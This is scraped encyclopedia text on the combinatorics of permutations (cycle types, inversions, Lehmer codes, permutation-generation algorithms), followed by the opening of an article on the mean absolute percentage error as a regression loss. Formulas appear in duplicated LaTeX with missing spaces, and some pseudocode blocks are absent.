The number ofn-permutations withkdisjoint cycles is the signlessStirling number of the first kind, denotedc(n,k){\displaystyle c(n,k)}or[nk]{\displaystyle [{\begin{smallmatrix}n\\k\end{smallmatrix}}]}.[40]
The cycles (including the fixed points) of a permutationσ{\displaystyle \sigma }of a set withnelements partition that set; so the lengths of these cycles form aninteger partitionofn, which is called thecycle type(or sometimescycle structureorcycle shape) ofσ{\displaystyle \sigma }. There is a "1" in the cycle type for every fixed point ofσ{\displaystyle \sigma }, a "2" for every transposition, and so on. The cycle type ofβ=(125)(34)(68)(7){\displaystyle \beta =(1\,2\,5\,)(\,3\,4\,)(6\,8\,)(\,7\,)}is(3,2,2,1).{\displaystyle (3,2,2,1).}
This may also be written in a more compact form as[112231].
More precisely, the general form is[1α12α2⋯nαn]{\displaystyle [1^{\alpha _{1}}2^{\alpha _{2}}\dotsm n^{\alpha _{n}}]}, whereα1,…,αn{\displaystyle \alpha _{1},\ldots ,\alpha _{n}}are the numbers of cycles of respective length. The number of permutations of a given cycle type is[41]
The number of cycle types of a set withnelements equals the value of thepartition functionp(n){\displaystyle p(n)}.
Polya'scycle indexpolynomial is agenerating functionwhich counts permutations by their cycle type.
In general, composing permutations written in cycle notation follows no easily described pattern – the cycles of the composition can be different from those being composed. However the cycle type is preserved in the special case ofconjugatinga permutationσ{\displaystyle \sigma }by another permutationπ{\displaystyle \pi }, which means forming the productπσπ−1{\displaystyle \pi \sigma \pi ^{-1}}. Here,πσπ−1{\displaystyle \pi \sigma \pi ^{-1}}is theconjugateofσ{\displaystyle \sigma }byπ{\displaystyle \pi }and its cycle notation can be obtained by taking the cycle notation forσ{\displaystyle \sigma }and applyingπ{\displaystyle \pi }to all the entries in it.[42]It follows that two permutations are conjugate exactly when they have the same cycle type.
The order of a permutationσ{\displaystyle \sigma }is the smallest positive integermso thatσm=id{\displaystyle \sigma ^{m}=\mathrm {id} }. It is theleast common multipleof the lengths of its cycles. For example, the order ofσ=(152)(34){\displaystyle \sigma =(152)(34)}islcm(3,2)=6{\displaystyle {\text{lcm}}(3,2)=6}.
Every permutation of a finite set can be expressed as the product of transpositions.[43]Although many such expressions for a given permutation may exist, either they all contain an even number of transpositions or they all contain an odd number of transpositions. Thus all permutations can be classified aseven or odddepending on this number.
This result can be extended so as to assign asign, writtensgnσ{\displaystyle \operatorname {sgn} \sigma }, to each permutation.sgnσ=+1{\displaystyle \operatorname {sgn} \sigma =+1}ifσ{\displaystyle \sigma }is even andsgnσ=−1{\displaystyle \operatorname {sgn} \sigma =-1}ifσ{\displaystyle \sigma }is odd. Then for two permutationsσ{\displaystyle \sigma }andπ{\displaystyle \pi }
It follows thatsgn(σσ−1)=+1.{\displaystyle \operatorname {sgn} \left(\sigma \sigma ^{-1}\right)=+1.}
The sign of a permutation is equal to the determinant of its permutation matrix (below).
Apermutation matrixis ann×nmatrixthat has exactly one entry 1 in each column and in each row, and all other entries are 0. There are several ways to assign a permutation matrix to a permutation of {1, 2, ...,n}. One natural approach is to defineLσ{\displaystyle L_{\sigma }}to be thelinear transformationofRn{\displaystyle \mathbb {R} ^{n}}which permutes thestandard basis{e1,…,en}{\displaystyle \{\mathbf {e} _{1},\ldots ,\mathbf {e} _{n}\}}byLσ(ej)=eσ(j){\displaystyle L_{\sigma }(\mathbf {e} _{j})=\mathbf {e} _{\sigma (j)}}, and defineMσ{\displaystyle M_{\sigma }}to be its matrix. That is,Mσ{\displaystyle M_{\sigma }}has itsjthcolumn equal to the n × 1 column vectoreσ(j){\displaystyle \mathbf {e} _{\sigma (j)}}: its (i,j) entry is to 1 ifi=σ(j), and 0 otherwise. Since composition of linear mappings is described by matrix multiplication, it follows that this construction is compatible with composition of permutations:
MσMτ=Mστ{\displaystyle M_{\sigma }M_{\tau }=M_{\sigma \tau }}.
For example, the one-line permutationsσ=213,τ=231{\displaystyle \sigma =213,\ \tau =231}have productστ=132{\displaystyle \sigma \tau =132}, and the corresponding matrices are:MσMτ=(010100001)(001100010)=(100001010)=Mστ.{\displaystyle M_{\sigma }M_{\tau }={\begin{pmatrix}0&1&0\\1&0&0\\0&0&1\end{pmatrix}}{\begin{pmatrix}0&0&1\\1&0&0\\0&1&0\end{pmatrix}}={\begin{pmatrix}1&0&0\\0&0&1\\0&1&0\end{pmatrix}}=M_{\sigma \tau }.}
It is also common in the literature to find the inverse convention, where a permutationσis associated to the matrixPσ=(Mσ)−1=(Mσ)T{\displaystyle P_{\sigma }=(M_{\sigma })^{-1}=(M_{\sigma })^{T}}whose (i,j) entry is 1 ifj=σ(i) and is 0 otherwise. In this convention, permutation matrices multiply in the opposite order from permutations, that is,PσPτ=Pτσ{\displaystyle P_{\sigma }P_{\tau }=P_{\tau \sigma }}. In this correspondence, permutation matrices act on the right side of the standard1×n{\displaystyle 1\times n}row vectors(ei)T{\displaystyle ({\bf {e}}_{i})^{T}}:(ei)TPσ=(eσ(i))T{\displaystyle ({\bf {e}}_{i})^{T}P_{\sigma }=({\bf {e}}_{\sigma (i)})^{T}}.
TheCayley tableon the right shows these matrices for permutations of 3 elements.
In some applications, the elements of the set being permuted will be compared with each other. This requires that the setShas atotal orderso that any two elements can be compared. The set {1, 2, ...,n} with the usual ≤ relation is the most frequently used set in these applications.
A number of properties of a permutation are directly related to the total ordering ofS,considering the permutation written in one-line notation as a sequenceσ=σ(1)σ(2)⋯σ(n){\displaystyle \sigma =\sigma (1)\sigma (2)\cdots \sigma (n)}.
Anascentof a permutationσofnis any positioni<nwhere the following value is bigger than the current one. That is,iis an ascent ifσ(i)<σ(i+1){\displaystyle \sigma (i)<\sigma (i{+}1)}. For example, the permutation 3452167 has ascents (at positions) 1, 2, 5, and 6.
Similarly, adescentis a positioni<nwithσ(i)>σ(i+1){\displaystyle \sigma (i)>\sigma (i{+}1)}, so everyiwith1≤i<n{\displaystyle 1\leq i<n}is either an ascent or a descent.
Anascending runof a permutation is a nonempty increasing contiguous subsequence that cannot be extended at either end; it corresponds to a maximal sequence of successive ascents (the latter may be empty: between two successive descents there is still an ascending run of length 1). By contrast anincreasing subsequenceof a permutation is not necessarily contiguous: it is an increasing sequence obtained by omitting some of the values of the one-line notation.
For example, the permutation 2453167 has the ascending runs 245, 3, and 167, while it has an increasing subsequence 2367.
If a permutation hask− 1 descents, then it must be the union ofkascending runs.[44]
The number of permutations ofnwithkascents is (by definition) theEulerian number⟨nk⟩{\displaystyle \textstyle \left\langle {n \atop k}\right\rangle }; this is also the number of permutations ofnwithkdescents. Some authors however define the Eulerian number⟨nk⟩{\displaystyle \textstyle \left\langle {n \atop k}\right\rangle }as the number of permutations withkascending runs, which corresponds tok− 1descents.[45]
An exceedance of a permutationσ1σ2...σnis an indexjsuch thatσj>j. If the inequality is not strict (that is,σj≥j), thenjis called aweak exceedance. The number ofn-permutations withkexceedances coincides with the number ofn-permutations withkdescents.[46]
Arecordorleft-to-right maximumof a permutationσis an elementisuch thatσ(j) <σ(i) for allj < i.
Foata'sfundamental bijectiontransforms a permutationσwith a given canonical cycle form into the permutationf(σ)=σ^{\displaystyle f(\sigma )={\hat {\sigma }}}whose one-line notation has the same sequence of elements with parentheses removed.[27][47]For example:σ=(513)(6)(827)(94)=(123456789375916824),{\displaystyle \sigma =(513)(6)(827)(94)={\begin{pmatrix}1&2&3&4&5&6&7&8&9\\3&7&5&9&1&6&8&2&4\end{pmatrix}},}
σ^=513682794=(123456789513682794).{\displaystyle {\hat {\sigma }}=513682794={\begin{pmatrix}1&2&3&4&5&6&7&8&9\\5&1&3&6&8&2&7&9&4\end{pmatrix}}.}
Here the first element in each canonical cycle ofσbecomes a record (left-to-right maximum) ofσ^{\displaystyle {\hat {\sigma }}}. Givenσ^{\displaystyle {\hat {\sigma }}}, one may find its records and insert parentheses to construct the inverse transformationσ=f−1(σ^){\displaystyle \sigma =f^{-1}({\hat {\sigma }})}. Underlining the records in the above example:σ^=5_136_8_279_4{\displaystyle {\hat {\sigma }}={\underline {5}}\,1\,3\,{\underline {6}}\,{\underline {8}}\,2\,7\,{\underline {9}}\,4}, which allows the reconstruction of the cycles ofσ.
The following table showsσ^{\displaystyle {\hat {\sigma }}}andσfor the six permutations ofS= {1, 2, 3}, with the bold text on each side showing the notation used in the bijection: one-line notation forσ^{\displaystyle {\hat {\sigma }}}and canonical cycle notation forσ.
σ^=f(σ)σ=f−1(σ^)123=(1)(2)(3)123=(1)(2)(3)132=(1)(32)132=(1)(32)213=(21)(3)213=(21)(3)231=(312)321=(2)(31)312=(321)231=(312)321=(2)(31)312=(321){\displaystyle {\begin{array}{l|l}{\hat {\sigma }}=f(\sigma )&\sigma =f^{-1}({\hat {\sigma }})\\\hline \mathbf {123} =(\,1\,)(\,2\,)(\,3\,)&123=\mathbf {(\,1\,)(\,2\,)(\,3\,)} \\\mathbf {132} =(\,1\,)(\,3\,2\,)&132=\mathbf {(\,1\,)(\,3\,2\,)} \\\mathbf {213} =(\,2\,1\,)(\,3\,)&213=\mathbf {(\,2\,1\,)(\,3\,)} \\\mathbf {231} =(\,3\,1\,2\,)&321=\mathbf {(\,2\,)(\,3\,1\,)} \\\mathbf {312} =(\,3\,2\,1\,)&231=\mathbf {(\,3\,1\,2\,)} \\\mathbf {321} =(\,2\,)(\,3\,1\,)&312=\mathbf {(\,3\,2\,1\,)} \end{array}}}As a first corollary, the number ofn-permutations with exactlykrecords is equal to the number ofn-permutations with exactlykcycles: this last number is the signlessStirling number of the first kind,c(n,k){\displaystyle c(n,k)}. Furthermore, Foata's mapping takes ann-permutation withkweak exceedances to ann-permutation withk− 1ascents.[47]For example, (2)(31) = 321 hask =2 weak exceedances (at index 1 and 2), whereasf(321) = 231hask− 1 = 1ascent (at index 1; that is, from 2 to 3).
Aninversionof a permutationσis a pair(i,j)of positions where the entries of a permutation are in the opposite order:i<j{\displaystyle i<j}andσ(i)>σ(j){\displaystyle \sigma (i)>\sigma (j)}.[49]Thus a descent is an inversion at two adjacent positions. For example,σ= 23154has (i,j) = (1, 3), (2, 3), and (4, 5), where (σ(i),σ(j)) = (2, 1), (3, 1), and (5, 4).
Sometimes an inversion is defined as the pair of values (σ(i),σ(j)); this makes no difference for thenumberof inversions, and the reverse pair (σ(j),σ(i)) is an inversion in the above sense for the inverse permutationσ−1.
The number of inversions is an important measure for the degree to which the entries of a permutation are out of order; it is the same forσand forσ−1. To bring a permutation withkinversions into order (that is, transform it into the identity permutation), by successively applying (right-multiplication by)adjacent transpositions, is always possible and requires a sequence ofksuch operations. Moreover, any reasonable choice for the adjacent transpositions will work: it suffices to choose at each step a transposition ofiandi+ 1whereiis a descent of the permutation as modified so far (so that the transposition will remove this particular descent, although it might create other descents). This is so because applying such a transposition reduces the number of inversions by 1; as long as this number is not zero, the permutation is not the identity, so it has at least one descent.Bubble sortandinsertion sortcan be interpreted as particular instances of this procedure to put a sequence into order. Incidentally this procedure proves that any permutationσcan be written as a product of adjacent transpositions; for this one may simply reverse any sequence of such transpositions that transformsσinto the identity. In fact, by enumerating all sequences of adjacent transpositions that would transformσinto the identity, one obtains (after reversal) acompletelist of all expressions of minimal length writingσas a product of adjacent transpositions.
The number of permutations ofnwithkinversions is expressed by aMahonian number.[50]This is the coefficient ofqk{\displaystyle q^{k}}in the expansion of the product
[n]q!=∏m=1n∑i=0m−1qi=1(1+q)(1+q+q2)⋯(1+q+q2+⋯+qn−1),{\displaystyle [n]_{q}!=\prod _{m=1}^{n}\sum _{i=0}^{m-1}q^{i}=1\left(1+q\right)\left(1+q+q^{2}\right)\cdots \left(1+q+q^{2}+\cdots +q^{n-1}\right),}
The notation[n]q!{\displaystyle [n]_{q}!}denotes theq-factorial. This expansion commonly appears in the study ofnecklaces.
Letσ∈Sn,i,j∈{1,2,…,n}{\displaystyle \sigma \in S_{n},i,j\in \{1,2,\dots ,n\}}such thati<j{\displaystyle i<j}andσ(i)>σ(j){\displaystyle \sigma (i)>\sigma (j)}.
In this case, say the weight of the inversion(i,j){\displaystyle (i,j)}isσ(i)−σ(j){\displaystyle \sigma (i)-\sigma (j)}.
Kobayashi (2011) proved the enumeration formula∑i<j,σ(i)>σ(j)(σ(i)−σ(j))=|{τ∈Sn∣τ≤σ,τis bigrassmannian}{\displaystyle \sum _{i<j,\sigma (i)>\sigma (j)}(\sigma (i)-\sigma (j))=|\{\tau \in S_{n}\mid \tau \leq \sigma ,\tau {\text{ is bigrassmannian}}\}}
where≤{\displaystyle \leq }denotesBruhat orderin thesymmetric groups. This graded partial order often appears in the context ofCoxeter groups.
One way to represent permutations ofnthings is by an integerNwith 0 ≤N<n!, provided convenient methods are given to convert between the number and the representation of a permutation as an ordered arrangement (sequence). This gives the most compact representation of arbitrary permutations, and in computing is particularly attractive whennis small enough thatNcan be held in a machine word; for 32-bit words this meansn≤ 12, and for 64-bit words this meansn≤ 20. The conversion can be done via the intermediate form of a sequence of numbersdn,dn−1, ...,d2,d1, wherediis a non-negative integer less thani(one may omitd1, as it is always 0, but its presence makes the subsequent conversion to a permutation easier to describe). The first step then is to simply expressNin thefactorial number system, which is just a particularmixed radixrepresentation, where, for numbers less thann!, the bases (place values or multiplication factors) for successive digits are(n− 1)!,(n− 2)!, ..., 2!, 1!. The second step interprets this sequence as aLehmer codeor (almost equivalently) as an inversion table.
In theLehmer codefor a permutationσ, the numberdnrepresents the choice made for the first termσ1, the numberdn−1represents the choice made for the second termσ2among the remainingn− 1elements of the set, and so forth. More precisely, eachdn+1−igives the number ofremainingelements strictly less than the termσi. Since those remaining elements are bound to turn up as some later termσj, the digitdn+1−icounts theinversions(i,j) involvingias smaller index (the number of valuesjfor whichi<jandσi>σj). Theinversion tableforσis quite similar, but heredn+1−kcounts the number of inversions (i,j) wherek=σjoccurs as the smaller of the two values appearing in inverted order.[51]
Both encodings can be visualized by annbynRothe diagram[52](named afterHeinrich August Rothe) in which dots at (i,σi) mark the entries of the permutation, and a cross at (i,σj) marks the inversion (i,j); by the definition of inversions a cross appears in any square that comes both before the dot (j,σj) in its column, and before the dot (i,σi) in its row. The Lehmer code lists the numbers of crosses in successive rows, while the inversion table lists the numbers of crosses in successive columns; it is just the Lehmer code for the inverse permutation, and vice versa.
To effectively convert a Lehmer codedn,dn−1, ...,d2,d1into a permutation of an ordered setS, one can start with a list of the elements ofSin increasing order, and foriincreasing from 1 tonsetσito the element in the list that is preceded bydn+1−iother ones, and remove that element from the list. To convert an inversion tabledn,dn−1, ...,d2,d1into the corresponding permutation, one can traverse the numbers fromd1todnwhile inserting the elements ofSfrom largest to smallest into an initially empty sequence; at the step using the numberdfrom the inversion table, the element fromSinserted into the sequence at the point where it is preceded bydelements already present. Alternatively one could process the numbers from the inversion table and the elements ofSboth in the opposite order, starting with a row ofnempty slots, and at each step place the element fromSinto the empty slot that is preceded bydother empty slots.
Converting successive natural numbers to the factorial number system produces those sequences inlexicographic order(as is the case with any mixed radix number system), and further converting them to permutations preserves the lexicographic ordering, provided the Lehmer code interpretation is used (using inversion tables, one gets a different ordering, where one starts by comparing permutations by theplaceof their entries 1 rather than by the value of their first entries). The sum of the numbers in the factorial number system representation gives the number of inversions of the permutation, and the parity of that sum gives thesignatureof the permutation. Moreover, the positions of the zeroes in the inversion table give the values of left-to-right maxima of the permutation (in the example 6, 8, 9) while the positions of the zeroes in the Lehmer code are the positions of the right-to-left minima (in the example positions the 4, 8, 9 of the values 1, 2, 5); this allows computing the distribution of such extrema among all permutations. A permutation with Lehmer codedn,dn−1, ...,d2,d1has an ascentn−iif and only ifdi≥di+1.
In computing it may be required to generate permutations of a given sequence of values. The methods best adapted to do this depend on whether one wants some randomly chosen permutations, or all permutations, and in the latter case if a specific ordering is required. Another question is whether possible equality among entries in the given sequence is to be taken into account; if so, one should only generate distinct multiset permutations of the sequence.
An obvious way to generate permutations ofnis to generate values for theLehmer code(possibly using thefactorial number systemrepresentation of integers up ton!), and convert those into the corresponding permutations. However, the latter step, while straightforward, is hard to implement efficiently, because it requiresnoperations each of selection from a sequence and deletion from it, at an arbitrary position; of the obvious representations of the sequence as anarrayor alinked list, both require (for different reasons) aboutn2/4 operations to perform the conversion. Withnlikely to be rather small (especially if generation of all permutations is needed) that is not too much of a problem, but it turns out that both for random and for systematic generation there are simple alternatives that do considerably better. For this reason it does not seem useful, although certainly possible, to employ a special data structure that would allow performing the conversion from Lehmer code to permutation inO(nlogn)time.
For generatingrandom permutationsof a given sequence ofnvalues, it makes no difference whether one applies a randomly selected permutation ofnto the sequence, or chooses a random element from the set of distinct (multiset) permutations of the sequence. This is because, even though in case of repeated values there can be many distinct permutations ofnthat result in the same permuted sequence, the number of such permutations is the same for each possible result. Unlike for systematic generation, which becomes unfeasible for largendue to the growth of the numbern!, there is no reason to assume thatnwill be small for random generation.
The basic idea to generate a random permutation is to generate at random one of then! sequences of integersd1,d2,...,dnsatisfying0 ≤di<i(sinced1is always zero it may be omitted) and to convert it to a permutation through abijectivecorrespondence. For the latter correspondence one could interpret the (reverse) sequence as a Lehmer code, and this gives a generation method first published in 1938 byRonald FisherandFrank Yates.[53]While at the time computer implementation was not an issue, this method suffers from the difficulty sketched above to convert from Lehmer code to permutation efficiently. This can be remedied by using a different bijective correspondence: after usingdito select an element amongiremaining elements of the sequence (for decreasing values ofi), rather than removing the element and compacting the sequence by shifting down further elements one place, oneswapsthe element with the final remaining element. Thus the elements remaining for selection form a consecutive range at each point in time, even though they may not occur in the same order as they did in the original sequence. The mapping from sequence of integers to permutations is somewhat complicated, but it can be seen to produce each permutation in exactly one way, by an immediateinduction. When the selected element happens to be the final remaining element, the swap operation can be omitted. This does not occur sufficiently often to warrant testing for the condition, but the final element must be included among the candidates of the selection, to guarantee that all permutations can be generated.
The resulting algorithm for generating a random permutation ofa[0],a[1], ...,a[n− 1]can be described as follows inpseudocode:
This can be combined with the initialization of the arraya[i] =ias follows
Ifdi+1=i, the first assignment will copy an uninitialized value, but the second will overwrite it with the correct valuei.
However, Fisher-Yates is not the fastest algorithm for generating a permutation, because Fisher-Yates is essentially a sequential algorithm and "divide and conquer" procedures can achieve the same result in parallel.[54]
There are many ways to systematically generate all permutations of a given sequence.[55]One classic, simple, and flexible algorithm is based upon finding the next permutation inlexicographic ordering, if it exists. It can handle repeated values, for which case it generates each distinct multiset permutation once. Even for ordinary permutations it is significantly more efficient than generating values for the Lehmer code in lexicographic order (possibly using thefactorial number system) and converting those to permutations. It begins by sorting the sequence in (weakly)increasingorder (which gives its lexicographically minimal permutation), and then repeats advancing to the next permutation as long as one is found. The method goes back toNarayana Panditain 14th century India, and has been rediscovered frequently.[56]
The following algorithm generates the next permutation lexicographically after a given permutation. It changes the given permutation in-place.
For example, given the sequence [1, 2, 3, 4] (which is in increasing order), and given that the index iszero-based, the steps are as follows:
Following this algorithm, the next lexicographic permutation will be [1, 3, 2, 4], and the 24th permutation will be [4, 3, 2, 1] at which pointa[k] <a[k+ 1] does not exist, indicating that this is the last permutation.
This method uses about 3 comparisons and 1.5 swaps per permutation, amortized over the whole sequence, not counting the initial sort.[57]
An alternative to the above algorithm, theSteinhaus–Johnson–Trotter algorithm, generates an ordering on all the permutations of a given sequence with the property that any two consecutive permutations in its output differ by swapping two adjacent values. This ordering on the permutations was known to 17th-century English bell ringers, among whom it was known as "plain changes". One advantage of this method is that the small amount of change from one permutation to the next allows the method to be implemented in constant time per permutation. The same can also easily generate the subset of even permutations, again in constant time per permutation, by skipping every other output permutation.[56]
An alternative to Steinhaus–Johnson–Trotter isHeap's algorithm,[58]said byRobert Sedgewickin 1977 to be the fastest algorithm of generating permutations in applications.[55]
The following figure shows the output of all three aforementioned algorithms for generating all permutations of lengthn=4{\displaystyle n=4}, and of six additional algorithms described in the literature.
Explicit sequence of swaps (transpositions, 2-cycles(pq){\displaystyle (pq)}), is described here, each swap applied (on the left) to the previous chain providing a new permutation, such that all the permutations can be retrieved, each only once.[64]This counting/generating procedure has an additional structure (call it nested), as it is given in steps: after completely retrievingSk−1{\displaystyle S_{k-1}}, continue retrievingSk∖Sk−1{\displaystyle S_{k}\backslash S_{k-1}}by cosetsSk−1τi{\displaystyle S_{k-1}\tau _{i}}ofSk−1{\displaystyle S_{k-1}}inSk{\displaystyle S_{k}}, by appropriately choosing the coset representativesτi{\displaystyle \tau _{i}}to be described below. Since eachSm{\displaystyle S_{m}}is sequentially generated, there is alast elementλm∈Sm{\displaystyle \lambda _{m}\in S_{m}}. So, after generatingSk−1{\displaystyle S_{k-1}}by swaps, the next permutation inSk∖Sk−1{\displaystyle S_{k}\backslash S_{k-1}}has to beτ1=(p1k)λk−1{\displaystyle \tau _{1}=(p_{1}k)\lambda _{k-1}}for some1≤p1<k{\displaystyle 1\leq p_{1}<k}. Then all swaps that generatedSk−1{\displaystyle S_{k-1}}are repeated, generating the whole cosetSk−1τ1{\displaystyle S_{k-1}\tau _{1}}, reaching the last permutation in that cosetλk−1τ1{\displaystyle \lambda _{k-1}\tau _{1}}; the next swap has to move the permutation to representative of another cosetτ2=(p2k)λk−1τ1{\displaystyle \tau _{2}=(p_{2}k)\lambda _{k-1}\tau _{1}}.
Continuing the same way, one gets coset representativesτj=(pjk)λk−1⋯λk−1(pik)λk−1⋯λk−1(p1k)λk−1{\displaystyle \tau _{j}=(p_{j}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{i}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{1}k)\lambda _{k-1}}for the cosets ofSk−1{\displaystyle S_{k-1}}inSk{\displaystyle S_{k}}; the ordered set(p1,…,pk−1){\displaystyle (p_{1},\ldots ,p_{k-1})}(0≤pi<k{\displaystyle 0\leq p_{i}<k}) is called the set of coset beginnings. Two of these representatives are in the same coset if and only ifτj(τi)−1=(pjk)λk−1(pj−1k)λk−1⋯λk−1(pi+1k)=ϰij∈Sk−1{\displaystyle \tau _{j}(\tau _{i})^{-1}=(p_{j}k)\lambda _{k-1}(p_{j-1}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{i+1}k)=\varkappa _{ij}\in S_{k-1}}, that is,ϰij(k)=k{\displaystyle \varkappa _{ij}(k)=k}. Concluding, permutationsτi∈Sk−Sk−1{\displaystyle \tau _{i}\in S_{k}-S_{k-1}}are all representatives of distinct cosets if and only if for anyk>j>i≥1{\displaystyle k>j>i\geq 1},(λk−1)j−ipi≠pj{\displaystyle (\lambda _{k-1})^{j-i}p_{i}\neq p_{j}}(no repeat condition). In particular, for all generated permutations to be distinct it is not necessary for thepi{\displaystyle p_{i}}values to be distinct. In the process, one gets thatλk=λk−1(pk−1k)λk−1(pk−2k)λk−1⋯λk−1(p1k)λk−1{\displaystyle \lambda _{k}=\lambda _{k-1}(p_{k-1}k)\lambda _{k-1}(p_{k-2}k)\lambda _{k-1}\cdots \lambda _{k-1}(p_{1}k)\lambda _{k-1}}and this provides the recursion procedure.
EXAMPLES: obviously, forλ2{\displaystyle \lambda _{2}}one hasλ2=(12){\displaystyle \lambda _{2}=(12)}; to buildλ3{\displaystyle \lambda _{3}}there are only two possibilities for the coset beginnings satisfying the no repeat condition; the choicep1=p2=1{\displaystyle p_{1}=p_{2}=1}leads toλ3=λ2(13)λ2(13)λ2=(13){\displaystyle \lambda _{3}=\lambda _{2}(13)\lambda _{2}(13)\lambda _{2}=(13)}. To continue generatingS4{\displaystyle S_{4}}one needs appropriate coset beginnings (satisfying the no repeat condition): there is a convenient choice:p1=1,p2=2,p3=3{\displaystyle p_{1}=1,p_{2}=2,p_{3}=3}, leading toλ4=(13)(1234)(13)=(1432){\displaystyle \lambda _{4}=(13)(1234)(13)=(1432)}. Then, to buildλ5{\displaystyle \lambda _{5}}a convenient choice for the coset beginnings (satisfying the no repeat condition) isp1=p2=p3=p4=1{\displaystyle p_{1}=p_{2}=p_{3}=p_{4}=1}, leading toλ5=(15){\displaystyle \lambda _{5}=(15)}.
From examples above one can inductively go to higherk{\displaystyle k}in a similar way, choosing coset beginnings ofSk{\displaystyle S_{k}}inSk+1{\displaystyle S_{k+1}}, as follows: fork{\displaystyle k}even choosing all coset beginnings equal to 1 and fork{\displaystyle k}odd choosing coset beginnings equal to(1,2,…,k){\displaystyle (1,2,\dots ,k)}. With such choices the "last" permutation isλk=(1k){\displaystyle \lambda _{k}=(1k)}fork{\displaystyle k}odd andλk=(1k−)(12⋯k)(1k−){\displaystyle \lambda _{k}=(1k_{-})(12\cdots k)(1k_{-})}fork{\displaystyle k}even (k−=k−1{\displaystyle k_{-}=k-1}). Using these explicit formulae one can easily compute the permutation of certain index in the counting/generation steps with minimum computation. For this, writing the index in factorial base is useful. For example, the permutation for index699=5(5!)+4(4!)+1(2!)+1(1!){\displaystyle 699=5(5!)+4(4!)+1(2!)+1(1!)}is:σ=λ2(13)λ2(15)λ4(15)λ4(15)λ4(15)λ4(56)λ5(46)λ5(36)λ5(26)λ5(16)λ5={\displaystyle \sigma =\lambda _{2}(13)\lambda _{2}(15)\lambda _{4}(15)\lambda _{4}(15)\lambda _{4}(15)\lambda _{4}(56)\lambda _{5}(46)\lambda _{5}(36)\lambda _{5}(26)\lambda _{5}(16)\lambda _{5}=}λ2(13)λ2((15)λ4)4(λ5)−1λ6=(23)(14325)−1(15)(15)(123456)(15)={\displaystyle \lambda _{2}(13)\lambda _{2}((15)\lambda _{4})^{4}(\lambda _{5})^{-1}\lambda _{6}=(23)(14325)^{-1}(15)(15)(123456)(15)=}(23)(15234)(123456)(15){\displaystyle (23)(15234)(123456)(15)}, yelding finally,σ=(1653)(24){\displaystyle \sigma =(1653)(24)}.
Because multiplying by swap permutation takes short computing time and every new generated permutation requires only one such swap multiplication, this generation procedure is quite efficient. Moreover as there is a simple formula, having the last permutation in eachSk{\displaystyle S_{k}}can save even more time to go directly to a permutation with certain index in fewer steps than expected as it can be done in blocks of subgroups rather than swap by swap.
Permutations are used in theinterleavercomponent of theerror detection and correctionalgorithms, such asturbo codes, for example3GPP Long Term Evolutionmobile telecommunication standard uses these ideas (see 3GPP technical specification 36.212[65]).
Such applications raise the question of fast generation of permutations satisfying certain desirable properties. One of the methods is based on thepermutation polynomials. Also as a base for optimal hashing in Unique Permutation Hashing.[66]
|
https://en.wikipedia.org/wiki/Cycle_notation
|
Themean absolute percentage error(MAPE), also known asmean absolute percentage deviation(MAPD), is a measure of prediction accuracy of a forecasting method instatistics. It usually expresses the accuracy as a ratio defined by the formula:
whereAtis the actual value andFtis the forecast value. Their difference is divided by the actual valueAt. The absolute value of this ratio is summed for every forecasted point in time and divided by the number of fitted pointsn.
Mean absolute percentage error is commonly used as a loss function forregression problemsand in model evaluation, because of its very intuitive interpretation in terms of relative error.
Consider a standard regression setting in which the data are fully described by a random pairZ=(X,Y){\displaystyle Z=(X,Y)}with values inRd×R{\displaystyle \mathbb {R} ^{d}\times \mathbb {R} }, andni.i.d. copies(X1,Y1),...,(Xn,Yn){\displaystyle (X_{1},Y_{1}),...,(X_{n},Y_{n})}of(X,Y){\displaystyle (X,Y)}. Regression models aim at finding a good model for the pair, that is ameasurable functiongfromRd{\displaystyle \mathbb {R} ^{d}}toR{\displaystyle \mathbb {R} }such thatg(X){\displaystyle g(X)}is close toY.
In the classical regression setting, the closeness ofg(X){\displaystyle g(X)}toYis measured via theL2risk, also called themean squared error(MSE). In the MAPE regression context,[1]the closeness ofg(X){\displaystyle g(X)}toYis measured via the MAPE, and the aim of MAPE regressions is to find a modelgMAPE{\displaystyle g_{\text{MAPE}}}such that:
gMAPE(x)=argming∈GE[|g(X)−YY||X=x]{\displaystyle g_{\mathrm {MAPE} }(x)=\arg \min _{g\in {\mathcal {G}}}\mathbb {E} {\Biggl [}\left|{\frac {g(X)-Y}{Y}}\right||X=x{\Biggr ]}}
whereG{\displaystyle {\mathcal {G}}}is the class of models considered (e.g. linear models).
In practice
In practicegMAPE(x){\displaystyle g_{\text{MAPE}}(x)}can be estimated by theempirical risk minimizationstrategy, leading to
g^MAPE(x)=argming∈G∑i=1n|g(Xi)−YiYi|{\displaystyle {\widehat {g}}_{\text{MAPE}}(x)=\arg \min _{g\in {\mathcal {G}}}\sum _{i=1}^{n}\left|{\frac {g(X_{i})-Y_{i}}{Y_{i}}}\right|}
From a practical point of view, the use of the MAPE as a quality function for regression model is equivalent to doing weightedmean absolute error(MAE) regression, also known asquantile regression. This property is trivial since
g^MAPE(x)=argming∈G∑i=1nω(Yi)|g(Xi)−Yi|withω(Yi)=|1Yi|{\displaystyle {\widehat {g}}_{\text{MAPE}}(x)=\arg \min _{g\in {\mathcal {G}}}\sum _{i=1}^{n}\omega (Y_{i})\left|g(X_{i})-Y_{i}\right|{\mbox{ with }}\omega (Y_{i})=\left|{\frac {1}{Y_{i}}}\right|}
As a consequence, the use of the MAPE is very easy in practice, for example using existing libraries for quantile regression allowing weights.
The use of the MAPE as a loss function for regression analysis is feasible both on a practical point of view and on a theoretical one, since the existence of an optimal model and theconsistencyof the empirical risk minimization can be proved.[1]
